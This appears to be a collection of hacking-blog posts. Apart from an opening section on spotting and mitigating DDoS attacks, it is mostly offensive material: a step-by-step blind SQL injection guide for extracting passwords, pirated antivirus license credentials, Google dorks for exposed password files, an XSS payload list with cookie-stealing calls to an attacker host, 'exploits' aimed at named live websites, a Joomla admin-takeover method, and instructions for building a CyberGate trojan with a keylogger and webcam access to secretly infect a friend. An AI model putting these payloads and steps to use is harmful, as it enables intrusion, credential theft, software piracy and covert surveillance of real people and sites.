Understanding DDOS Attack !!!

What is DDos Attack ?


Compromised PCs, or “bots,” are formed into groups called “botnets” and are used as weapons by cyber-attackers to launch various forms of cyber attacks. These attacks range widely from DDoS to identity theft and clandestine intelligence gathering operations.
During Distributed Denial of Service attempts, attackers launch attacks using different techniques including HTTP, HTTPS, ICMP, SYN Floods, UDP Floods, DNS Request Floods, GET Floods, and others. The attack components are often used in combination, and range in size from a few hundred megabits per second (Mbps) to over 80 gigabits per second (Gbps). Increasingly sophisticated attacks are based around application requests at Layer-7.
Normally, DDOS consists of 3 parts . One is the Master ,Other the slave and atlast the victim. The master is the attack launcher ie the person/machine behind all this,sound’s COOL right . The slave is the network which is being compromised by the Master and Victim is the target site/server . Master informs the compromised machines, so called slaves to launch attack on the victim’s site/machine. Hence its also called co-ordinated attack.


How do they Do it ?


DDOS is done in 2 phases. In the first phase they try to compromise weak machines in different networks around the world. This phase is called Intrusion Phase. Its in the next phase that they install DDOS tools and starts attacking the victims machines/site. This Phase is called Distributed DoS attacks phase.

What Allowed them to Do ?

Vulnerable softwares/Applications running on a machine or network.

Open network setup.

Network/ machine setup without taking security into account.

No monitoring or DataAnalysis are being conducted.

No regular Audit / Software upgrades being conducted.

First Identify if you are really under attack. If yes, follow the below steps :

Check if your machines load is high and you have large number of HTTP process running.

To find the load just use the command w or uptime -

–

Eg:

ashish@localhost>w 12:00:36 up 1 day, 20:27, 5 users, load average: 0.70, 0.70, 0.57

USER XYZ FROM LOGIN@ IDLE JCPU PCPU WHAT

–

To find if there is large number of HTTP process running use the command ” ps -aux|grep HTTP|wc -l ”

–

Eg:

[ashish@localhost]# ps -aux|grep HTTP|wc -l

23

–

In a heavy server , the number of connection will go above 100. But during DDOS attack, the number will go even higher and thats when we need to find out from which all networks are these attacks coming. In DDOS the host machine doesn’t have much importance. Its the network which is of importance here because, an attacker will use any machine on the compromised network or even will use all the machines in the network. Hence network address is of importance while fighting with the attack.

However, there are some actions you can take to protect yourself. Here's some basic advice:

Ensure that you have adequate bandwidth on your Internet connection. You'll be able to foil many low-scale DDoS attacks by simply having enough bandwidth (and processing power) to service the requests.

Deploy an intrusion prevention system on your network. Some (but definitely not all) DDoS attacks have recognizable signatures that an IPS can detect and use to prevent the requests from reaching the Web server.

Use a DDoS prevention appliance, including any of the Cisco Systems Inc. Cisco Guard products, that is specifically designed to identify and thwart distributed denial-of-service attacks.

Maintain a backup Internet connection with a separate pool of IP addresses for critical users. While you won't be able to switch all access to your website over to a backup connection (the attacks will switch at the same time!), you can provide critical users with an alternate path to your site if the primary circuit is swamped with bogus requests.

These tips should get you started on the road toward building a hardy Web infrastructure with the highest probability of surviving a DDoS attack. Good luck!

Blind SQL Injection Tutorial !!!!!

Blind injection is a little more complicated the classic injection but it can be done :D 


It's some what hard but good to Learn 


1) http://www.site.com/news.php?id=5


when we execute this, we see some page and articles on that page, pictures etc... then when we want to test it for blind sql injection attack


2) http://www.site.com/news.php?id=5 and 1=1 <--- this is always true


and the page loads normally, that's ok.now the real test


3) http://www.site.com/news.php?id=5 and 1=2 <--- this is false


so if some text, picture or some content is missing on returned page then that site is vulrnable to blind sql injection.Hacker's Work Started :) 


1) Get the MySQL version


to get the version in blind attack we use substring 
i.e
http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4


this should return TRUE if the version of MySQL is 4.replace 4 with 5, and if query return TRUE then the version is 5. 
i.e
http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5


2) Test if subselect works 
when select don't work then we use subselect 
i.e
http://www.site.com/news.php?id=5 and (select 1)=1 


if page loads normally then subselects work.then we gonna see if we have access to mysql.user
i.e
http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1


if page loads normally we have access to mysql.user and then later we can pull some password usign load_file() function and OUTFILE.


3). Check table and column names.This is part when guessing is the best friend for Hacker ...
i.e.
http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1 (with limit 0,1 our query here returns 1 row of data, cause subselect returns only 1 row, this is very important.)


then if the page loads normally without content missing, the table users exits.
if you get FALSE (some article missing), just change table name until you guess the right one :)


let's say that we have found that table name is users, now what we need is column name. 
the same as table name, we start guessing. Like i said before try the common names for columns.
i.e.
http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1


if the page loads normally we know that column name is password (if we get false then try common names or just guess) 
here we merge 1 with the column password, then substring returns the first character (,1,1)




4). Pull data from database
we found table users i columns username password so we gonna pull characters from that.


http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80


ok this here pulls the first character from first user in table users. 
substring here returns first character and 1 character in length. ascii() converts that 1 character into ascii value and then compare it with simbol greater then > .
 so if the ascii char greater then 80, the page loads normally. (TRUE)
 we keep trying until we get false.


http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95


we get TRUE, keep incrementing


http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98


TRUE again, higher


http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99


FALSE!!!


so the first character in username is char(99). Using the ascii converter we know that char(99) is letter 'c'.


then let's check the second character.


http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99


Note that i'm changed ,1,1 to ,2,1 to get the second character. (now it returns the second character, 1 character in lenght)


http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99


TRUE, the page loads normally, higher.


http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>107


FALSE, lower number.


http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>104


TRUE, higher.


http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>105


FALSE!!!


we know that the second character is char(105) and that is 'i'. We have 'ci' so far
 so keep incrementing until you get the end. (when >0 returns false we know that we have reach the end).
 There are some tools for Blind SQL Injection, i think sqlmap is the best, but i'm doing everything manually,
 cause that makes you better SQL INJECTOR :D


NOTE: This is just for Educational Purpose.

ESET Nod32 Keys Username And Password !!!

Hello Friends,
Here are  some Fresh Username and Password for ESET NOD32 Antivirus.. :-)

Username: EAV-51526916
Password: kpvr48kr5n
Expiration: 13/03/2017

Username: EAV-54108373
Password: sm6rr8rmdj
Expiration: 29/04/2017

Username: EAV-54108377
Password: pnkxjm4rua
Expiration: 29/04/2017

Username: EAV-54108379
Password: vckucfdev5
Expiration: 29/04/2017

Username: TRIAL-56225335
Password: 78c5pfcrhn
Expiration: 29/12/2011

Username: TRIAL-56225342
Password: ts3a7caesf
Expiration: 29/12/2011

Username: TRIAL-56225354
Password: auvdaptrtd
Expiration: 29/12/2011

Username: TRIAL-56225364
Password: 54jfje4664
Expiration: 29/12/2011

Username: TRIAL-56277215
Password: 68kt7taxre
Expiration: 30/12/2011

Username: TRIAL-56277229
Password: dsan686r5r
Expiration: 30/12/2011

Username: TRIAL-56277239
Password: a3vrexd6ee
Expiration: 30/12/2011

Username: TRIAL-56277247
Password: jdcru3bmxs
Expiration: 30/12/2011

Username: TRIAL-56277259
Password: rs826jj82u
Expiration: 30/12/2011

Username: TRIAL-56277449
Password: 2xv2s3tfu3
Expiration: 30/12/2011

Username: TRIAL-56277453
Password: dbusepfuxp
Expiration: 30/12/2011

Username: TRIAL-56277460
Password: t7j44r4t7p
Expiration: 30/12/2011

Free Antivirus Avast 4.8 Professional License Keys !!!

Hello Friends ,

 Today I will Give you Avast 4.8 Professional License Keys !!

1) First Download Avast

2) Then Install The Antivirus .

3) After that go to Maintenance ==> Registration ==> Insert the License Key ..
 

Serials last till to 1 may 2012!

S/N:W3446436R8800P1106-FX9VZPYF
S/N:W9685010R8800L1106-ZVDWCSCK
S/N:W3518199R8800K1106-WNYVBKA6
S/N:W9237226R8800E1106-M8X7LFND
S/N:W1112550R8800F1106-HD4RXPKT
S/N:W2548301R8800J1106-LUF4R92C
S/N:W9465601R8800U1106-2R4XVTFY
S/N:W7760656R8800A1106-398KP8FZ
S/N:W9654686R8800U1106-6L51HC20
S/N:W8598235R8800D1106-BMCW3VNR
S/N:S9097868R9097F1106-CRUDS1Y2  

 Serials Last till to 2013-2016 years

S/N:W7444164R9965A0911-KAJBBSDL
S/N:W1003130R9975A0912-RCUR86KL
S/N:W5299231R9973A0911-4PN0Y545
S/N:W7630705R9946A0912-D3EFM38L
S/N:W4264775R9967A0911-6ZSDBUL9
S/N:S8128161R9977A0911-FAM7JJH8
S/N:S1464458R9970A0912-9M3D30L4
S/N:S1122519R9970A0911-2WLUXS0Y
S/N:S1902164R9954A0911-7FNEU1BC
S/N:C5101589R9945A0910-PX0H0W8S
S/N:C2080008R9941A0911-N9H4S8YM
S/N:C7987628R9972A0910-BE721D8S

Password Search Queries using Google Dork !!!

"admin account info" filetype:log
! Host=*.* intext :enc_UserPassword=* ext:pcf
"# -FrontPage-" ext:pwd inurl: (service | authors | administrators | users) "# -FrontPage-" inurl:service.pwd "AutoCreate=TRUE password =*" "http://*:*@www" domainname
"index of/" "ws_ftp.ini" "parent directory" "liveice configuration file" ext:cfg -site: sourceforge.net
"parent directory" +proftpdpasswd
"powered by ducalendar" -site:duware.com "Powered by Duclassified" -site: duware.com
"Powered by Duclassified" -site:duware.com "DUware All Rights reserved"
"powered by duclassmate" - site:duware.com
"Powered by Dudirectory" -site:duware.com "powered by dudownload" -site: duware.com
"Powered By Elite Forum Version *.*"
"Powered by Link Department"
"sets mode: +k"
"your password is" filetype:log
" Powered by DUpaypal" -site: duware.com
allinurl: admin mdb auth_user_file.txt
config.php
eggdrop filetype:user user
enable password | secret "current configuration" -intext : the
etc (index.of)
ext:asa | ext:bak intext :uid intext :pwd -"uid..pwd" database | server | dsn
ext:inc "pwd=" "UID=" ext:ini eudora.ini
ext:ini Version=4.0.0.4 password ext:passwd -intext :the - sample -example
ext:txt inurl:unattend. txt
ext:yml database inurl:config filetype:bak createobject sa
filetype: bak inurl:"htaccess|passwd|shadow| htusers"
filetype:cfg mrtg "target[*]" - sample -cvs -example
filetype:cfm "cfapplication name" password filetype: conf oekakibbs
filetype:conf slapd.conf filetype:config config intext : appSettings "User ID"
filetype:dat "password .dat"
filetype:dat inurl:Sites. dat
filetype:dat wand.dat
filetype:inc dbconn
filetype:inc intext : mysql_connect
filetype:inc mysql_connect OR mysql_pconnect filetype:inf sysprep
filetype:ini inurl:"serv-u.ini"
filetype:ini inurl: flashFXP.ini
filetype:ini ServUDaemon filetype:ini wcx_ftp
filetype:ini ws_ftp pwd
filetype:ldb admin
filetype:log "See `ipsec --copyright"
filetype:log inurl:"password .log"
filetype:mdb inurl: users.mdb
filetype:mdb wwforum filetype:netrc password filetype:pass pass intext :userid
filetype:pem intext : private
filetype:properties inurl:db intext :password filetype:pwd service filetype:pwl pwl
filetype:reg reg +intext :"defaultusername" +intext
:"defaultpassword"
filetype:reg reg +intext :”WINVNC3”
filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS
filetype:sql "insert into" (pass|passwd|password )
filetype:sql ("values * MD5" | "values * password " | "values * encrypt";)
filetype:sql ("passwd values" | " password values" | "pass values" )
filetype:sql +"IDENTIFIED BY" -cvs
filetype:sql password filetype:url +inurl:"ftp://" +inurl:";@"
filetypels username password email
htpasswd
htpasswd / htgroup
htpasswd / htpasswd.bak
intext
:"enable password 7"
intext :"enable secret 5 {:content:}quot;
intext
:"powered by EZGuestbook"
intext
:"powered by Web Wiz Journal" intitle:"index of" intext :connect.inc intitle:"index of" intext :globals.inc intitle:"Index of" passwords modified intitle:"Index of" sc_serv.conf sc_serv content
intitle:"phpinfo()" +"mysql. default_password" +"Zend Scripting Language Engine"
intitle:dupics inurl: (add.asp | default.asp | view.asp | voting.asp) -site:duware.com
intitle: index.of administrators.pwd
intitle: Index.of etc shadow
intitle:index.of intext :"secring.skr"|"secring. pgp"|"secring.bak"
intitle:rapidshare intext :login
inurl:"calendarscript/users. txt"
inurl:"editor/list.asp" | inurl:"database_editor.asp" | inurl:"login.asa" "are set"
inurl:"GRC. DAT" intext :"password "
inurl:"Sites. dat"+"PASS="
inurl:"slapd.conf" intext
:"credentials" -manpage -"Manual Page" -man: -sample
inurl:"slapd.conf" intext :"rootpw" -manpage -"Manual Page" -man: -sample
inurl:"wvdial. conf" intext :"password "
inurl:/db/main. mdb
inurl:/wwwboard
inurl:/yabb/ Members/Admin.dat
inurl:ccbill filetype:log
inurl:cgi-bin inurl:calendar. cfg
inurl:chap-secrets -cvs
inurl:config. php dbuname dbpass
inurl:filezilla.xml -cvs
inurl:lilo.conf filetype:conf password -tatercounter2000 -bootpwd - man
inurl:nuke filetype:sql
inurl:ospfd. conf intext :password -sample -test - tutorial -download
inurl:pap-secrets - cvs
inurl:pass.dat
inurl:perform filetype: ini
inurl:perform.ini filetype:ini
inurl: secring ext:skr | ext:pgp | ext:bak
inurl: server.cfg rcon password inurl: ventrilo_srv.ini adminpassword
inurl: vtund.conf intext :pass -cvs
inurl:zebra. conf intext :password -sample -test - tutorial -download
LeapFTP intitle:"index.of./" sites.ini modified master.passwd
mysql history files NickServ registration passwords
passlist passlist.txt (a better way)
passwd passwd / etc (reliable)
people.lst psyBNC config files
pwd.db
server-dbs "intitle:index of"
signin filetype:url spwd.db / passwd
trillian.ini
wwwboard WebAdmin inurl:passwd.txt wwwboard|webadmin
[WFClient] Password = filetype:ica

How to Hack webisites using IIS Exploit !!!

Hello friends today  i am posting very easy technique of web hacking using IIS Exploit.

1) Go to Start ==> My Network Places ==> Add a Network Place

2) Click om Next ==> Choose Another network Location.

 3) Click on Next ==> Now type the Vulnerable Website address.

After that Click on next.

Click Next ==> Finish..
After that you can see it from My Network Places..

Here are some IIS Vulnerable Website..

http://disk.hzyhzhx.com
http://disk.hzyhzhx.com/
http://ayatolahkhamenae.parniansis.com/
http://bahadori1.parniansis.com/
http://beheshti.parniansis.com/
http://beheshti1.parniansis.com/
http://bentolhoda1.parniansis.com/
http://bitaraf.parniansis.com/
http://derakhshan.parniansis.com/
http://derakhshan1.parniansis.com/
http://derakhshan2.parniansis.com/
http://derakhshan3.parniansis.com/
http://ebnesina.parniansis.com/
http://emamali.parniansis.com/
http://emkhaleghiyeyzd.parniansis.com/

How to Hack webisites using IIS Exploit !!!

Hello friends today  i am posting very easy technique of web hacking using IIS Exploit.
1) Go to Start ==> My Network Places ==> Add a Network Place

2) Click om Next ==> Choose Another network Location.

 3) Click on Next ==> Now type the Vulnerable Website address.

After that Click on next.

 Click Next ==> Finish.
After  that you can see it in your my Network places... :-)

Here are Some IIS Vulnerable Website..

XSS CHEAT LIST !!!!

1. <IMG SRC=javascript:alert( String.fromCharCode(88,83,83))>
2. <script src=http://yoursite.com/your_files.js></script>
3. </title><script>alert(/xss/)</script>
4. </textarea><script>alert(/xss/)</script>
5. <IMG LOWSRC=\"javascript:alert('XSS')\">
6. <IMG DYNSRC=\"javascript:alert('XSS')\">
7. <font style='color:expression(alert(document.cookie))'>
8. <img src="javascript:alert('XSS')">
9. <script language="JavaScript">alert('XSS')</script>
10. [url=javascript:alert('XSS');]click me[/url]
11. <body onunload="javascript:alert('XSS');">
12. <script>alert(1);</script>
13. <script>alert('XSS');</script>
14. <script src="http://www.evilsite.org/cookiegrabber.php"></script>
15. <script>location.href="http://www.evilsite.org/cookiegrabber.php?cookie="+escape(document.cookie)</script>
16. <scr<script>ipt>alert('XSS');</scr</script>ipt>
17. <script>alert(String.fromCharCode(88,83,83))</script>
18. <img src=foo.png onerror=alert(/xssed/) />   
19. <style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style>   
20. <? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?>   
21. <marquee><script>alert('XSS')</script></marquee>   
22. <IMG SRC=\"jav&#x09;ascript:alert('XSS');\">   
23. <IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">   
24. <IMG SRC=\"jav&#x0D;ascript:alert('XSS');\
25. <body onLoad="alert('XSS');"   
26. [color=red' onmouseover="alert('xss')"]mouse over[/color] 
27. "/></a></><img src=1.gif onerror=alert(1)>    
28. window.alert("Bonjour !");   
29. <div style="x:expression((window.r==1)?'':eval('r=1;   
30. alert(String.fromCharCode(88,83,83));'))">   
31. <iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>   
32. "><script alert(String.fromCharCode(88,83,83))</script>   
33. '>><marquee><h1>XSS</h1></marquee>   
34. '">><script>alert('XSS')</script>   
35. '">><marquee><h1>XSS</h1></marquee>   
36. <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">   
37. <META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">   
38. <script>var var = 1; alert(var)</script>   
39. <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>   
40. <?='<SCRIPT>alert("XSS")</SCRIPT>'?>   
41. <IMG SRC='vbscript:msgbox(\"XSS\")'>   
42. " onfocus=alert(document.domain) "> <"   
43. <FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>   
44. <STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS   
45. perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out   
46. perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out   
47. <br size=\"&{alert('XSS')}\">   
48. <scrscriptipt>alert(1)</scrscriptipt>   
49. </br style=a:expression(alert())>   
50. </script><script>alert(1)</script> 
51. <SCRIPT>document.write("XSS");</SCRIPT>   
52. a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d);   
53. ='><script>alert("xss")</script>
54. <script+src=">"+src="http://yoursite.com/xss.js?69,69"></script>   
55. <body background=javascript:'"><script>alert(navigator.userAgent)</script>></body>   
56. ">/XaDoS/><script>alert(document.cookie)</script>
57. <script>  src="http://www.site.com/XSS.js"></script>   
58. ">/KinG-InFeT.NeT/><script>alert(document.cookie)</script>   
59. src="http://www.site.com/XSS.js"></script>         
60. "><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>   
61. [color=red width=expression(alert(123))][color]   
62. <BASE HREF="javascript:alert('XSS');//">   
63. Execute(MsgBox(chr(88)&chr(83)&chr(83)))<   
64. "></iframe><script>alert(123)</script>   
65. <body onLoad="while(true) alert('XSS');">   
66. '"></title><script>alert(1111)</script>   
67. </textarea>'"><script>alert(document.cookie)</script>   
68. '""><script language="JavaScript"> alert('X \nS \nS');</script>   
69. </script></script><<<<script><>>>><<<script>alert(123)</script>      
70. <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">   
71. '></select><script>alert(123)</script>   
72. '>"><script src = 'http://www.site.com/XSS.js'></script>   
73. }</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>
74. <html><noalert><noscript>(123)</noscript><script>(123)</script>    

HACK WebSites using RTE Web Vulnerability !!!!!

Hello Friends ,
Here i am posting another method  to hack a website using RTE Vulnerability :-)

Dork: " inurl:RTE_popup_file_atch.asp"

Copy the Dork in the Google and you will get a link .
Eg: http://www.site.com/RTE_popup_file_atch.asp

 After that Click on Choose File ==> Upload.
Once your have uploaded your File you can see the File URL in the Right Hand Side ...Just copy the URL and paste it after website name...

I have one Website for you..
http://capcomputers.be/
http://capcomputers.be/RTE_popup_file_atch.asp

Enjoy ;-)

Chat with Friends through Command Prompt !!!!

All you need is your friend's IP Address and your Command Prompt.
 Open Notepad and write this code as it is.....!

@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A

•  Now save this as "Messenger.Bat".

• Open Command Prompt.

• Drag this file (.bat file) over to Command Prompt and press Enter.

• Now, type the IP Address of the computer you want to contact and press enter

•  Now all you need to do is type your message and press Enter.

           Start Chatting.......:-)

Create Your Own Fake Warning Message Screen !!!!

Hello friends...
Making your own fake warning message screen... Now its very easy...
1. open notepad...
2.Just copy & paste it:

lol=msgbox("Warning computer has been infected by a virus ",20,"Virus Alert")..
3. save it as a extension .vbs

Your fake warning message box ready to use..
Try it & Enjoy...

U can change your message by editing "computer has been infected by a virus" & replace it with ur message which u want to show...

Hidden Facebook Smileys Emotions codes... Only 4 my Loving Frndzz...

Hidden Smileys and Emoticons:

Really happy emote: :D or :-D



Wink emote: ;) or ;-)

Happy eyes: ^_^

Laughing eyes: >:o

Cat smile: :3

Grumpy: >:-(

Sad: :( or :-(

Crying emoticon: :’(

Shocked emoticon: :o or :-o

Glasses emoticon: 8) or 8-)

Cool shades: 8-|

Rude: :p or :-p

WHAT?!: O.o

Dork emote: -_-

Duhhh emote: :/ or :\

Devil emote: 3:)

Angel emote: O:)

Kiss emote: :-* or :*

Love emote: <3

Pacman: :v

Robot: :|]

Putnam’s face: :putnam:


Penguin
<(")

How to Hack Joomla Using Token ByPass. !!!!

Today I will Show you how to Bypass Joomla token  and find user name. 

The vulnerability is reported in all 1.5.x versions prior to 1.5.6.

Dork:index.php?option=com_user&view=reset&layout=confirm 

Copy and paste this Dork in google and you will get the result.
For Eg:http://site.com/index.php?option=com_user&view=reset&layout=confirm

After getting this kind of page just put Qoute ( ' )  in the Submit button and then click on Submit.

After that you will get the option to reset the Password. :-)

Once you have reset the Passsword it will show you the login page .

Now you have to find the Username . :-) 

Now go to the URL and paste this dork 

index.php?option=com_fireboard&Itemid=71&func=userlist

 Eg: http://site.com/index.php?option=com_fireboard&Itemid=71&func=userlist

Here you will get the Username for login. :-)

Now you have get the Username and password for the login..Try It . :)

Yeppee...You have access the Administrator Panel..

Note:Special thanks to  Shriniwas.!!!

How to Hack your friends computer using Cybergate !!!

1) Download the Software Cybergate .

2)Install Cybergate.

3)After Installation it will ask you for the Password.

Default Password: cybergate

4)Once you have put the password, Click on Login.

You will get the message

CyberGate Station is now unlocked and fully functional.

5)After that Click on control Center ==>Start

   It will Ask you for the Port Number. You can assign any Port number from 0 to 65535.But remember don't assign well known Ports like 80,21 etc..

6) Once You have Assign the Port Number ,Go to Control Center ==>Builder==>Create Server 

After that Add the New User==>>Ok==>>Then Double Click on the User you have Add

7)Now Click on Add.

 After that you will need to add your IP Addresswith the Port number you have add before.

 Eg: 192.168.1.1:999
To get You IP address go to Run==>cmd==>>ipconfig 

8)Once you have Added the IP address and Port number go to Installation Tab .

Here you will get Different Option.

 =>Installation Directory :
Now Select any one option. where you want to infect your trojan in your Friends computer .
=>Boot:

Select Registry option also  .

Always Select the Random keys for Active Setup and Mutex.
=> Inject Into:

Mostly Select the Default Browser.
9)Now go to Message Tab:

You can display any message on your Friends computer , when he opens your File..

10)Now go to Keylogger Tab:

 It will give you all the Keystrokes of your Friends computer.

11)Now Directly Create Server: 

Click on Create Server and Save you File ..

After that just give this file to your Friend and when he click on that File you will get the access of his system.

You can download his files at your End.If the Person is having the Webcam you can access it..That's you are Having the Total Control of his System..
Note: You will maintain the Access till you have the same IP assign to your Computer..